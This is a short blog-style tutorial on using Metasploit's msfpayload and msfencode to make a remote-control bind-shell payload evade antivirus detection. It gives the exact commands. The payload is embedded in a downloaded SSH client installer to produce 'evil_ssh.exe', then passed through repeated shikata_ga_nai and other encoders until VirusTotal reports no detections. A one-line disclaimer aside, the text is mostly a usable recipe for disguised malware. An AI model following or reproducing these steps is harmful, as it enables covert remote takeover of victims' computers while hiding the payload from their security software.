So in this tutorial we will show you
step by step on how to make a virus Fully Undetectable from all the
antiviruses. Their are lots of approaches, however here we will take a look at
how to make an executable FUD using msfencode.
Requirements
- Metasploit ( Kali Linux )
Attention
We are using some harmless test
files but don’t infect people with any real viruses. That would be a crime.
Purpose
Antivirus protects machines from
malware but not all of it .there are ways to pack malware to make it harder to
detect. well use metasploit to render malware completely invisible to
antivirus.
Creating
a Listener
This is a simple payload that gives
the attacker remote control of a machine. It is not a virus ant won’t spread,
but it is detected by antivirus engines. In Kali Linux in a Terminal windows
execute these commands:
msfpayload windows/shell_bind_tcp
LPORT=2482 X > /root/listen.exe
ls -l listen.exe
You should see the listen.exe file
as shown below:
Analyzing
the Listener with Virus Total
Click the “Choose File”
button. Navigate to /root and double-click the listen.exe “listen.exe”
appears in the “Choose File” box, as shown below:
In the virustotal web page , Click
the “scan it” button!
If you see a “File already analyzed”
message, click the “View last analysis” button.
The analysis shows that many of the
antivirus engines detected the file: 37 out of 51, when I did it, as shown
below. You may see different numbers, but many of the engines should detect it.
Encoding
the Listener
this process will encode the
listener, & insert it into an innocent SSH file.
In BackTrack/Kali, in a Terminal
window, execute these commands:
wget
ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exe
msfencode -i /root/listen.exe -t exe
-x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e
x86/shikata_ga_nai -c 1
s -l evil*
You should see the evil-ssh.exe file
as shown below :
Scan
with Virus Total
If you see a “File already analyzed”
message, click the “View last analysis” button.
The analysis shows that fewer of the
antivirus engines detect the file now: 8 out of 51, when I did it, as shown
below. You may see different numbers.
Encode the Listener Again This
process will encode the listener with several different encodings.
In Kali Linux, in a Terminal window,
execute these commands:
msfencode -i /root/listen.exe -t raw
-o /root/listen2.exe -e x86/shikata_ga_nai -c 1
msfencode -i /root/listen2.exe -t
raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t
raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o
/root/listen5.exe -e x86/shikata_ga_nai -c 1
ls -l listen*
You should see several files as
shown below:
Analyzing
Again
The analysis shows that fewer of the
antivirus engines detect the file now 0 out of 51 When I did it as shown below.
you may see different numbers.
No comments:
Post a Comment